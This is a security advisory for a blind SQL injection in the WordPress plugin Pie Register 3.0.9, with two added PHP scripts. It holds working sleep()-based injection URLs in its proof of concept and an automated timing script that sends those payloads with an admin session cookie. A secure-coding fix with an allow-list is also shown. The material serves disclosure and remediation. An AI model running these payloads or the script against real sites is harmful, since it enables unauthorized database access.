# Title: WordPress Plugin Pie Register <= 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969

# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.

# III. DESCRIPTION
# The bug was found in the following file:
# /pie-register/classes/invitation_code_pagination.php: if ( isset( $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php: $order = $_GET['order'];
# The "order" parameter is taken straight from the request and is only passed
# through esc_sql() before it reaches the query:
# /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order );
# esc_sql() only escapes characters that matter inside a quoted string literal
# (quotes, backslashes). The value is used unquoted as the ORDER BY direction,
# so a payload that contains no quotes passes through unchanged and is
# executed as part of the query.
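The following is an added example, not code from the Pie Register plugin: it reproduces the vulnerable pattern described above with a stand-in for esc_sql(), shows that the proof-of-concept payload survives the escaping untouched, and puts the allow-list fix beside it. The table and column names, and the esc_sql() stand-in, are assumptions made for the demonstration.

```php
<?php
// Added example (not Pie Register's own code): why esc_sql() does not stop
// this injection, and the allow-list fix for an ORDER BY built from $_GET.
// Run offline: php order_by_demo.php

// Stand-in for WordPress esc_sql(). Assumption: like mysqli_real_escape_string,
// it only escapes the characters that matter inside a quoted string literal.
function esc_sql_standin(string $value): string
{
    return strtr($value, [
        "\\" => "\\\\", "'" => "\\'", "\"" => "\\\"",
        "\0" => "\\0", "\n" => "\\n", "\r" => "\\r",
    ]);
}

// Vulnerable pattern from invitation_code_pagination.php: the escaped value is
// concatenated, unquoted, into the ORDER BY clause. Table and column names
// here are placeholders, not the plugin's real schema.
function build_query_vulnerable(string $orderby, string $order): string
{
    $order = esc_sql_standin($order);
    return "SELECT * FROM invitation_codes ORDER BY {$orderby} {$order} LIMIT 0, 20";
}

// Hardened version: the sort column and direction are chosen from fixed
// allow-lists, so no user-controlled bytes ever reach the SQL text.
function build_query_safe(string $orderby, string $order): string
{
    $allowed_columns = ['name', 'code', 'date_created']; // assumed column names
    $column    = in_array($orderby, $allowed_columns, true) ? $orderby : 'name';
    $direction = (strtoupper($order) === 'ASC') ? 'ASC' : 'DESC';
    return "SELECT * FROM invitation_codes ORDER BY `{$column}` {$direction} LIMIT 0, 20";
}

// The payload from the proof of concept, already URL-decoded (%2c => ',').
$payload = 'desc,(select*from(select(sleep(2)))a)';

echo "esc_sql() output : ", esc_sql_standin($payload), PHP_EOL; // unchanged: nothing to escape
echo "vulnerable query : ", build_query_vulnerable('name', $payload), PHP_EOL;
echo "hardened query   : ", build_query_safe('name', $payload), PHP_EOL;
```

Note that wpdb::prepare() is not the fix here either: its %s placeholder is wrapped in single quotes, so ORDER BY 'DESC' would become a string literal rather than the keyword. Identifiers and keywords have to be validated against an allow-list, as above, rather than escaped or parametrized.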

# IV. PROOF OF CONCEPT
# The following URLs have been confirmed to suffer from time-based blind SQL
# injection. The page is served through /wp-admin/admin.php, so an
# authenticated session with access to the plugin's invitation codes page is
# required to reach it.

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc (original)

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1 (2 seconds of response)

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1 (30 seconds of response)

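As an added example (not part of the original advisory), the following PHP CLI script turns the manual timing check above into a repeatable one: it requests the original page, then the same page with sleep(2) and sleep(5) injected, and only reports the injection as confirmed when the delays scale with the sleep() argument, so a single slow response caused by network jitter is not mistaken for injection. The base URL, the session cookie and the delay values are parameters you supply; the path is the one from the proof of concept.

```php
<?php
// Added example (not part of the advisory): time-based confirmation of the
// Pie Register "order" injection by comparing response times.
// Usage: php sqli_timing_check.php http://host/wordpress 'wordpress_logged_in_...=...'

// Build the proof-of-concept URL; delay 0 gives the original, benign request.
function sleep_url(string $base, int $delay): string
{
    $order = $delay > 0 ? "desc,(select*from(select(sleep({$delay})))a)" : 'desc';
    return $base . '/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order='
        . rawurlencode($order);
}

// Fetch a URL with the admin session cookie and return the elapsed seconds.
function fetch_seconds(string $url, string $cookie): float
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIE         => $cookie, // admin.php requires an authenticated session
        CURLOPT_TIMEOUT        => 60,
    ]);
    $start = microtime(true);
    curl_exec($ch);
    $elapsed = microtime(true) - $start;
    curl_close($ch);
    return $elapsed;
}

// Each delayed request must take roughly its sleep() longer than the baseline,
// and the longer one must take roughly (long - short) seconds more than the
// short one; a 10% tolerance absorbs normal timing noise.
function looks_injectable(float $baseline, float $short, float $long,
                          int $shortDelay, int $longDelay): bool
{
    return ($short - $baseline) >= $shortDelay * 0.9
        && ($long  - $baseline) >= $longDelay  * 0.9
        && ($long  - $short)    >= ($longDelay - $shortDelay) * 0.9;
}

[$script, $base, $cookie] = $argv + [null, 'http://localhost/wordpress', ''];
$baseline = fetch_seconds(sleep_url($base, 0), $cookie);
$short    = fetch_seconds(sleep_url($base, 2), $cookie);
$long     = fetch_seconds(sleep_url($base, 5), $cookie);
printf("baseline %.2fs, sleep(2) %.2fs, sleep(5) %.2fs => %s\n",
    $baseline, $short, $long,
    looks_injectable($baseline, $short, $long, 2, 5) ? 'INJECTABLE' : 'not confirmed');
```

Keep the delays small and run the check a few times: a sleep() in an ORDER BY expression holds a database connection for the whole duration, and a 30-second value like the last request above is enough to tie up workers on a small site.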
# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9

# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability discovered by Manuel Garcia Cardenas
# May 10, 2018 2: Sent to vendor, no response
# June 05, 2018 3: Second email to vendor, no response
# June 11, 2018 4: Sent to the Full-Disclosure list

# VII. SOLUTION
# Disable the plugin until a fix is available.